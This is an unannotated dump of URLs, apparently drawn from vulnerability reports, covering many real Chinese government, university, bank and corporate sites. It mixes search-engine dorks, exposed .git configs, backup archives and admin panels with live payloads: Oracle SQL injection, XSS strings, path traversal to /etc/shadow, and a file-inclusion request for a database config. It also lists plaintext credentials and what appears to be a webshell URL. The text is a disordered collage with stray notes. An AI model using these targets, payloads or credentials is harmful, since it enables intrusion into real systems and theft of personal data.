http://218.58.124.131:8003/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://111.17.169.213:801/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.56.40.229:8045/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://uowechat.wandoujia.com/.git/config http://uowechat.wandoujia.com/.git http://uowechat.wandoujia.com/.git http://zljs.lishui.gov.cn/publish/index.php?NodeID=215 inurl:slview.aspx?tname= 
http://jwh.tanljgzx.gov.cn/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://221.2.149.47:8200/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.58.124.131:8003/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://111.17.169.213:801/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.56.40.229:8045/ckq/slview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://xmjmedu.com:8085/jmpwbm http://xmjmedu.com:8085/jmpwbm/data/ http://xmjmedu.com:8085/jmpwbm/dbbak/ inurl:plview.aspx?tname= http://jwh.tanljgzx.gov.cn/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://221.2.149.47:8200/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba 
http://218.58.124.131:8003/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://111.17.169.213:801/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.56.40.229:8045/ckq/plview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://gift.lefen.cn http://**.**.**/_ http://**.**.**/ http://**.**.**/ inurl:caiwgkview.aspx?tname= http://jwh.tanljgzx.gov.cn/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://221.2.149.47:8200/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.58.124.131:8003/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://111.17.169.213:801/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba 
http://218.56.40.229:8045/ckq/nlListOut.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://www.gtggjy.com/TSPB/gtweb/public/ShowInfo.jsp?pubGuid=F74599BB524992915BCBBD2285374B07&type=6 http://www.jszbw.com/TSPB/web/zbgg/Content.jsp?pubGuid=E8E6DFC4BE15C6BF577040017255BCF1&itemType=1&pubType=0 http://www.smztb.com.cn/TSPB/web/pubinfo/pubInfoContent.jsp?pubGuid=56BD48A58BF595380768D96BB987FC17&itemType=&pubType=0 http://221.13.64.100:8080/speedlist.action http://car.51yund.com http://cms.51yund.com/sport/ http://car.51yund.com/phpmyadmin/index.php https://www.twbbs.tw www.oppodigital.com.cn http://service.jiuyang.com.cn/js/ajaxGetStationByCityJson.do?cityid=81C017FCBC79D04DE040007F01007E11&stationname=%25E6%2598%25A0%25E5%25B1%25B1&from=0&to=5 http://api.joyoung.com:8089/ia/appapi/loadimg?fileid=7b5fb6f0cbb54f93b4ebea766261e2bc http://www.pa18tianqin.com/ http://58.56.83.222/ecweb http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas http://i.game.weibo.cn/appsvc/appsvc.php?bid=13 http://i.game.weibo.cn/appsvc/appsvc.php?bid=13 http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas http://i.game.weibo.cn/appsvc/appsvc.php?bid=13&cmd=packageinfo&package=a5game.leidian2_sinas http://malaysia.soufun.com.tw/js.asp?n=1&j=13&tid=1 http://wcmc.csu.edu.cn:8080/zlpg/bbsDeal!getExcExperienceBBSContent.action http://wcmc.csu.edu.cn:8080/zlpg/justshe.jsp http://www.mrchuang.com/index/showarticledetail/id/201328934.html去掉.html加个 http://www.mrchuang.com/index/showarticledetail/?id=201328934 www.mrchuang.com/dbadmin/ http://www.haagri.gov.cn/xxgk/xxgkinfo.action?typeid=1 http://www.haagri.gov.cn/html/search/articleSearch.action http://wljy.sjy.net.cn/albumCommentsAction!insert.action http://www.nmjyw.cn/albumCommentsAction!insert.action http://search.zikao.eol.cn/admin/exam_page.php?exam_id=36 http://www.ahmzyf.com/ 
http://60.173.150.158:8090/upload/TZ/ http://www.ctspc.fcu.edu.tw/ http://www.ctspc.fcu.edu.tw/manage/login.php http://www.ctspc.fcu.edu.tw/manage/admin.php http://123.233.241.233/ http://123.233.241.233/html/index.html http://0978595101.soufun.com.tw/NewsDetail.aspx?newsid= http://0978595101.soufun.com.tw/GoodsDetail.aspx?Goodsid= http://61.155.173.182:610/admin.php http://api.dianping.com/ http://23825228.soufun.com.tw/news.aspx?newsid=2025 http://ask.sdo.com/userinfo/myreview?gameno=45 http://www.mao10.com/ http://www.mao10.com/article-66.html http://fan.wandoulabs.com/log http://fan.wandoulabs.com/api/rank http://fan.wandoulabs.com/api/data/%E8%B5%9B%E7%99%BE%E5%91%B3%28%E8%A5%BF%E5%B0%8F%E5%8F%A3%29 http://uowechat.wandoujia.com/.git/config http://fan.wandoulabs.com/.git http://fan.wandoulabs.com/.git http://mail.bjsasc.com/user/aa.txt http://www.swdpb.gov.cn/ShowClass_wsbs.asp?ClassID=3 http://www.swdpb.gov.cn/admin_login.asp http://www.epweike.com/index.php?do=ajax&view=talent_seo&g_id=2&p=&c=&page=1 http://www.epweike.com/index.php?do=ajax&view=talent_seo&g_id=2 http://dlhaier.com/ http://dlhaier.com/show_foot.asp?pkid=2257&c_id=295 http://dlhaier.com/show_foot.asp?pkid=2257&c_id=295 http://dlhaier.com/show_foot.asp?pkid=2257&c_id=295 http://58.221.14.206:8035/luPaiZuAction.action http://eshop.picchealth.com/claim/reportCase.jsp.bak http://eshop.picchealth.com/complain/customerComplain.jsp.bak http://eshop.picchealth.com/contQuery/password/resetPassword/index.jsp.bak http://eshop.picchealth.com/contQuery/personal/index.jsp.bak http://eshop.picchealth.com/index.jsp.bak http://eshop.picchealth.com/newSales/index.jsp.bak http://eshop.picchealth.com/sales/payForm.jsp.bak http://eshop.picchealth.com/contQuery/password/login/checkLogin.jsp.bak http://eshop.picchealth.com/contQuery/password/login/checkLogin.jsp.bak中,有一段代码是这么写的, www.zhaopin.com http://bdwsw.zhanchenggame.com/index.php?c=general&m=get_general_by&type=3%27 
http://map.sogou.com/store/nanchong+n=%3Cimg%20src=%22%22%3E%3C/img%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript http://www.taonan.gov.cn/more.jsp?catalogId=1710000000 http://www.rc.com.cn/news/business.asp?id=%28length%28CTXSYS.DRITHSX.SN%28user%2c%28select+chr%2895%29||chr%2833%29||chr%2864%29||chr%2851%29||chr%28100%29||chr%28105%29||chr%28108%29||chr%28101%29||chr%28109%29||chr%28109%29||chr%2897%29+from+DUAL%29%29%29%29 http://www.rc.com.cn/company/ http://www.hikvisioneurope.net/bak.jsp http://wooyun.org/bugs/wooyun-2015-093653 site:shangliu.haier.com http://bbs.qingcheng.com/data/cache/index.php aspnet:MaxHttpCollectionKeys aspnet:MaxJsonDeserializerMembers aspnet:MaxHttpCollectionKeys aspnet:MaxJsonDeserializerMembers http://www.xian.12306.cn/Dzsw/Shky/hwky.wai/ http://www.xian.12306.cn/Dzsw/index.jsp后,系统账号密码即默认填写,登陆即可 http://basic.10jqka.com.cn/admin/index.php?op=csiReport&act=view http://my.55bbs.com/user_index.php?ac=dialog&dialogid=52806017&relateuid=4192990&pmid=52806018&folder=inbox&inboxpage=1 http://localhost/qibo/bk/blog/member/postlog.php?job=postlog http://www.ihaier.com/channel?order=1 http://www.ihaier.com/partners/?order=1 http://www.qagt.gov.cn/admin_999/web_manage@qkhot.asp http://XX.com/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00 http://wooyun.org/bugs/wooyun-2014-088313 http://www.zsglj.com/ http://home.ciwong.com/ http://113.108.109.39:8089/EasyXI/SRM/VendorPortal/Default.aspx http://www.zyrs.gov.cn/sites/templateLib/cache/20140701/zhiCJSJKS.jsp?PID=2c9e81e44b31e763014b4365f030001f http://www.zyrs.gov.cn/admin/login.htm http://daoyou-chaxun.cnta.gov.cn/ http://www.maxthon.cn/ http://mgtest.ipaychat.com/loginAction!login.action http://mgtest.ipaychat.com/error.jsp try.daqi.com/cgi-bin/experience/report_show?id_article=16 http://www.cxaic.gov.cn/xgwj/xgwj_show.asp?id=2 http://store.boe.com/store/index.html 
http://114.113.144.146/usermgrLogin!getLogin.action http://59.108.97.197:28017 http://59.108.97.197:8080 www.chinesegamer.net http://banner2.chinesegamer.net/gamebn/abm.aspx?z=63 https://github.com/wangxiaoqi/ttxlbs/blob/083a8d3bd3ac23cfe892f819f7443f332f7130bf/%E5%9F%9F%E5%90%8D%E4%B8%8E%E7%A9%BA%E9%97%B4.txt http://www.xinnet.com/index.html inurl:WoodsManage.aspx http://221.2.171.59:8300/ExtWebModels/LandManage/WoodsManage.aspx http://60.2.214.118:8088/ExtWebModels/LandManage/WoodsManage.aspx http://121.17.2.52/ExtWebModels/LandManage/WoodsManage.aspx http://rctdlz.cn/ExtWebModels/LandManage/WoodsManage.aspx http://221.1.104.11:8011/ExtWebModels/LandManage/WoodsManage.aspx http://demo.inongyou.cn/ExtWebModels/LandManage/WoodsManage.aspx http://221.2.171.59:8000/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://222.135.109.70:8100/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://61.133.119.187:8089/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://222.135.127.190:7000/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://60.217.72.17:8000/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://221.2.149.47:8100/gaoquviewimg.aspx?id=220&newsid=1260&deptid=51 http://gz.focus.cn//group/vote.php?group_id=1641&m=0&v_poll_id=687 inurl:showlandlist.aspx?InfoType= http://60.2.214.118:8088/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://121.17.2.52/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://rctdlz.cn/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://221.1.104.11:8011/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://61.186.154.210:8088/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://demo.inongyou.cn/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 http://221.2.171.59:8300/ExtWebModels/WebFront/showlandlist.aspx?InfoType=转包 inurl:Town.aspx?class= http://60.2.214.118:8088/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://121.17.2.52/ExtWebModels/WebFront/town/Town.aspx?class=000001 
http://rctdlz.cn/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://221.1.104.11:8011/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://61.186.154.210:8088/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://demo.inongyou.cn/ExtWebModels/WebFront/town/Town.aspx?class=000001 http://221.2.171.59:8300/ExtWebModels/WebFront/town/Town.aspx?class=000001 inurl:ShowBusinessList.aspx?ctype= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://60.2.214.118:8088/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://121.17.2.52/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://rctdlz.cn/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://61.186.154.210:8088/ExtWebModels/WebFront/ShowCompanyList.aspx?ctype=0 http://guangai.dayoo.com/jzShow/gacs/list/id/3 http://guangai.dayoo.com/front/login3.html http://www.rzdgyy.com/news_list.php?type_id=2 http://www.rzdgyy.com/news_list.php?type_id=2 http://www.rzdgyy.com/appo_login.php http://www.rzdgyy.com/staff_login.php http://www.rzdgyy.com/super_login.php http://www.rzdgyy.com/bbs http://gzycdtb.dayoo.com/baoming/baoli.php http://t.eastmoney.com/login.aspx http://9night.kimiss.com http://admin.heitao.com https://passport.lenovo.com/wauthen/login http://58.56.128.21/sendmessage/ https://github.com/KaiyiZhang/Secipt/blob/master/LFI.TESTER.py http://xsc.gzhu.edu.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php http://www.zhuqu.com/tuce/314811.html http://www.zhuqu.com/tuce/314806.html http://www.huimaiche.com/Login?re=http%253a%252f%252fi.huimaiche.com%253a80%252fUser%252fUserInfo.aspx http://demo.kesion.com/user/weibo.asp http://t.10jqka.com.cn/ http://**.**.**/homePage.do_ http://**.**.**/loginaction!userAuthority.action_ http://**.**.**/login.action http://www.53kf.com/log.txt http://master.53kf.com/info.php 
http://www.rzeic.gov.cn/tzjg/denglu.php http://www.rzeic.gov.cn/dzxx/denglu.php http://www.rzeic.gov.cn/jscx/ http://www.rzeic.gov.cn/wlsj/denglu.php http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs存在注入点 http://www.whudx.com/admin/main.aspx http://222.73.242.38/cpcUsers/login http://zlgc.edugd.cn/proapply/login.do http://www.yczjw.cn/wtjob.asp?id=21 http://job0514.com/wtjob.asp?id=21 http://www.dtrsrc.com/wtjob.asp?id=21 http://www.tfjyfw.com/wtjob.asp?id=229 http://www.mmhu.cn/wtjob.asp?id=30 http://112.124.28.12/wtjob.asp?id=21 http://www.mdjmg.com/wtjob.asp?id=21 http://www.dykr.com/wtjob.asp?id=3090 http://www.yczjw.cn/admin/login.asp http://job0514.com/admin/login.asp http://www.dtrsrc.com/admin/login.asp http://www.tfjyfw.com/admin/login.asp http://www.mmhu.cn/admin/login.asp http://www.dykr.com/wtjob.asp?id=3090 http://www.fruitday.com http://www.crmstjc.com.cn/ http://www.crmstjc.com.cn/news_Show_user.asp?ID=868 http://oa.wzfc.zjol.com.cn/ http://feedback.doshow.com.cn/feedback/addFeedback.action http://jwcad.ahut.edu.cn/article/ArticleShow.asp?ArticleID=1066 http://chajian.baidu.com/app-res.html http://wx.cqcb.com/index.php?g=Wap&m=Vote&a=index&token=****&wecha_id=****‘&id=21 http://dealer.xcar.com.cn/dealer/dealer_ajax_search.php?ac=show_dealer&bid=210&province_id=1&city_id=475 http://dealer.xcar.com.cn/dealer/dealer_ajax_search.php?ac=show_dealer&bid=210&province_id=1&city_id=475 www.361sport.com/index.php?m=info&a=show&id=8存在注入 http://222.76.242.141:8888/ http://222.76.242.141:8888/queryGrzhxxJson.shtml?custAcct=10030010078&startDate=20140204&endDate=20150204 http://www.186online.com/usermanager/gd165login.do?userName=admin&passWord=admin&Submit232=%26%23160%3B%B5%C7%C2%BC%26%23160%3B password:wEAver2012 name:ecology7 http://club.dzwww.com/forum.php?mod=viewthread&tid=46273305&page=4#pid80541501 http://box.zhangmen.baidu.com/box-jump.html?u=javascript:alert%28document.domain%29 http://zpsurveyadmin.zhaopin.com/admin/admin.php?action=logout 
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?Page=2&xinwenlxbh=&XinWenMC=1 http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20080328001 http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20071204001&XinWenMC=1 http://service.yonyou.com/ajax/ajax,UFIDA.Service.ashx?_method=GetChanPinBB&_session=no http://oa.wzfc.zjol.com.cn/bbs/ http://219.143.118.112:8080/YJZHCL/user_manage.jsp http://www.sharp.cn/ http://www.gzsums.net/default.aspx中山大学附属第一医院在国家卫生计生委某系统的账户存在弱口令,导致全院医生信息泄漏风险。包括姓名、身份证、详细住址、邮箱、执业证、资格证、籍贯、联系方式等等。 http://dqkh.cmda.org.cn/ http://218.94.36.88/index.php http://www.xaglkp.com/ http://www.xaglkp.com/TicketOrder/printTicket?bookno=693335&start=1002 http://www.xaglkp.com/TicketOrder/printTicket?bookno=693342&start=1002 https://oa.minshengec.cn/seeyon/index.jsp http://www.life.uestc.edu.cn/高校外包网站漏洞不忍直视,成都新西软 http://bang.liba.com/site/198 https://mail.homelink.com.cn/ http://yi-version.qiniudn.com/@/familymonitor/1.8.5.1C_201514062136home http://yi-version.qiniudn.com/@/familymonitor/1.8.5.1B_201513211614home http://yi-version.qiniudn.com/@/familymonitor/ http://182.242.231.170:803/mailbox/showemail.asp http://219.216.19.233:8081/mailbox/showemail.asp http://www.qzygz.com:8081/mailbox/showemail.asp http://210.45.98.55/mailbox/showemail.asp http://220.165.85.220:8000/mailbox/showemail.asp http://vip.library.neusoft.edu.cn/mailbox/showemail.asp http://124.93.245.83/mailbox/showemail.asp http://library.fjrtvu.edu.cn:1080/mailbox/showemail.asp http://mall.moji.com/ http://kms.h3c.com/kms/kms/dir/list_article_4_h3c_cn?kmtype=9 http://kms.h3c.com/kms/kms/dir/list_article_4_h3c_cn?kmtype=9 http://unadmin.ucweb.com http://www.tdm.com.mo http://www.tdm.com.mo/c_video/play_audio.php?id=5043 http://www.tdm.com.mo/c_video/play_audio.php?id=5043 http://www.tdm.com.mo/c_video/play_audio.php?id=5043 http://www.hisensephone.com/search.aspx?q= http://123.125.22.73/ http://123.125.22.73/jj/jj.zip http://123.125.22.73/viprs/conf/conf.conf 
http://123.125.22.73/viprs/init.py http://www.xzsdyyy.com/xzsdyyy.rar http://www.xaglkp.com/ http://www.xaglkp.com/Account/Getpwd http://www.xaglkp.com/Account/GetpwdAction2 http://www.xaglkp.com/TicketOrder/UserInfo http://www.xaglkp.com/TicketOrder/UserInfoUpdate?abc=save http://218.65.112.148:81/ http://www.bjprd.com.cn:88/PreciousE/admin/Booking_JFLY.asp?FClass=1 http://210.30.190.86/PreciousE/admin/Booking_Apply.asp?FClass=0304 http://zcgl.usc.edu.cn/gzyq/admin/Booking_Apply.asp?FClass=07 http://202.193.80.53/pe/admin/Booking_JFLY.asp?FClass=X http://sbgx.nefu.edu.cn/peweb/admin/Booking_JFLY.asp?FClass=5 http://60.28.194.208:8881/sendsms.php?user=webmonitor&passwd=d3gq39rko&mobile=xxx&content=xxxxx http://60.28.194.208:8881/ http://campus.chinahr.com/2015/pages/citicscampus2015/ http://www.ccb.com/cn/html1/office/ebank/dzb/subject/12/docs/security/CCB_E_Setup_Total_20140819_x64.exe http://www.cebbank.com/site/resource/cms/2015/01/2015012616221316533.zip https://dlsev.boc.cn/support/seccwidgets/SecEdit.BOC.exe https://e.bank.ecitic.com/perbank5/download/helpmate/HelpmateSetup.exe http://blogs.technet.com/b/fdcc/archive/2011/11/03/enabling-initialize-and-script-activex-controls-not-marked-as-safe-in-any-zone-can-get-you-hurt-bad.aspx http://www.icbc-ltd.com/icbcltd/%e5%85%b3%e4%ba%8e%e6%88%91%e8%a1%8c/%e5%b7%a5%e8%a1%8c%e6%96%b0%e9%97%bb/%e4%b8%ad%e5%9b%bd%e5%b7%a5%e5%95%86%e9%93%b6%e8%a1%8c%e5%85%ac%e5%b8%832013%e5%b9%b4%e5%ba%a6%e7%bb%8f%e8%90%a5%e6%83%85%e5%86%b5.htm http://open.youku.com/admin_db_backup.aspx?action=BackupData http://www.sknow.com.cn/ http://www.runhome.com.cn/catnews.php?catid=17 http://www.fujin.gov.cn:8080/wcm/web_sosuo/ http://app.finance.ifeng.com/hq/trade/draw_zijin.php?type=z&cate=ind http://democn.shop-builder.cn/?m=product&s=detail&id=465 http://democn.shop-builder.cn http://mse.se.sjtu.edu.cn/Login.aspx http://mse.se.sjtu.edu.cn http://60.216.5.39/login.do?method=init 
http://localhost/phpok/admin.php?c=tpl&f=delfile&id=1&folder=./../../data/&title=install.lock http://localhost/phpyun/data/backup/PHPYUN~1.SQL http://tw.53kf.com/setting/site_edit.php?arg=pwoycjkyf247031 http://topic.xcar.com.cn/201107/jlys/list.php?iscar=0&count=2259&per=8&cur=7 http://app.finance.ifeng.com/money/insurance_cc_detail.php?qtype=id&query=534 http://xuancheng.gov.cn http://tieba.jxedt.com/wap/t.asp?/=12&T=1 http://silicongroup.zju.edu.cn/973/news_detail.asp?id=17 http://silicongroup.zju.edu.cn/973/news_detail.asp?id=17 http://silicongroup.zju.edu.cn/973/login.asp http://silicongroup.zju.edu.cn/login.asp http://www.airfex.net/cn_asp/prosvr http://www.airfex.net/cn_asp/twzs.asp?id=354 http://111.160.90.67:8181/tologin.action http://sec.lenovo.com/Home/PopUpIndex/#/Login/Login?rd=%2f http://www.km-jsw.com/index!search.xhtml www.womai.com)注册的用户,在club社区的登录密码是统一的密码,包括某些版主,超级版主等。 cn:8080/gklqjgcx/gklqcxjg.asp http://122.0.71.86:810/Sys/index.aspx http://www.gxjnjc.gov.cn/auditor/admin/login.action http://enpower.bdchina.com:8001/jxt/news/bulletinTemplate.jsp?id=1992 http://enpower.bdchina.com:8001/jxt/news/newsTemplate.jsp?id=2117 http://oa.mingdao.edu.tw/md/200310/honor/show.php?News_ID=1339 http://wooyun.org/bugs/wooyun-2015-096319 http://www.ncu.edu.tw/~ncu7020/rdnewsletter/resultshare.php?action=show&cid=34&id=15 admin:password http://wooyun.org/bugs/wooyun-2010-085006 http://113.108.148.4:8090/ http://www.lbsfj.gov.cn/jsp/cmsNews/cmsNewsView.action http://27.223.70.11/index_admin.asp http://manage.21its.com/Management http://manage.21its.com/Management/Hr/HRUserWorksMain.aspx http://shop.tongzhuo100.com http://xxwj.dg.gov.cn/door/daj/index_index.action http://m.feedback.oppo.com http://www.chinakjzx.com/column.do?ID=41 http://www.chinakjcxdb.com/column.do?ID=138 http://www.zgwscy.com/column.do?ID=60 http://115.47.21.161:8080/column.do?ID=64 http://www.chinazwyl.com/ http://www.zgwscy.com/column.do?ID=60 http://www.chinakjcxdb.com/column.do?ID=138 
http://app.zjepb.gov.cn:8089/nbjcsj/LoginAction_login http://lhshbj.gov.cn/adm/index.php http://www.cofcoyoucai.com/ http://www.qhsdsh.com/infor.php?id= cn:995 cn:993 cn:143 cn:110 cn:995 http://club.bydauto.com.cn/uc_server/avatar.php?uid=107733 http://218.25.76.133/a/ma.jsp?action=command http://www.kugou.com/fm2/app/musicshow/admin/njadmin/index.php http://www2.kugou.com/fm2/app/musicshow2/nj/index/njid=xxx http://edu.cma.gov.cn/forum.php http://118.144.75.11:106/ http://campus.xunlei.com/p/test_list.html?city=12#&cityname=%E8%A5%BF%E5%AE%89 http://yzd.chinasafety.gov.cn/ReportQuery/qyInfo/qyInfoDetail.aspx?qy_ID=32297 https://vpn.nari-relays.com/ http://168.160.250.22/Login.action http://www.jxjtj.gov.cn/ewebeditor/admin/default.aspx http://118.244.201.7:8080/award/award3.php?id=3 http://118.244.201.7:8080/database.zip http://118.244.201.7:8080/data.zip http://118.244.201.7:8080/www.zip http://118.244.201.7:8080/backup.zip http://118.244.201.7:8080/123456.rar http://118.244.201.7:8080/12345.rar http://118.244.201.7:8080/333.rar http://182.242.231.170:803/sujuku/login_sjk.asp http://219.216.19.233:8081/sujuku/login_sjk.asp http://www.qzygz.com:8081/sujuku/login_sjk.asp http://210.45.98.55/sujuku/login_sjk.asp http://220.165.85.220:8000/sujuku/login_sjk.asp http://vip.library.neusoft.edu.cn/sujuku/login_sjk.asp http://210.44.80.46/sujuku/login_sjk.asp http://library.fjrtvu.edu.cn:1080/sujuku/login_sjk.asp http://www.handu.com/user.php?act=qpassword_name http://bianlun.7k7k.com/comment_pk.htm?pkid=52 ftp://121.207.254.152/ http://nderp.99.com/Main_Default.aspx http://deviceadmin.sj.91.com/login.aspx?stat=0 http://ndea.99.com/Default.aspx http://www.jjsgsl.gov.cn/index.php?_m=mod_article&_a=fullist&caa_id=22 http://baoxian.axatp.com/showSmallHomeMoneySalesPreview.do?linkResource=&orderID=&ecInsureId=74505815021006034994&isSee= http://www.dlwsxx.com/ws2004/model/login1.asp http://www.fzjcxx.cn/ws2004/model/login1.asp http://www.nxyancgjzx.com/ws2004/model/login1.asp 
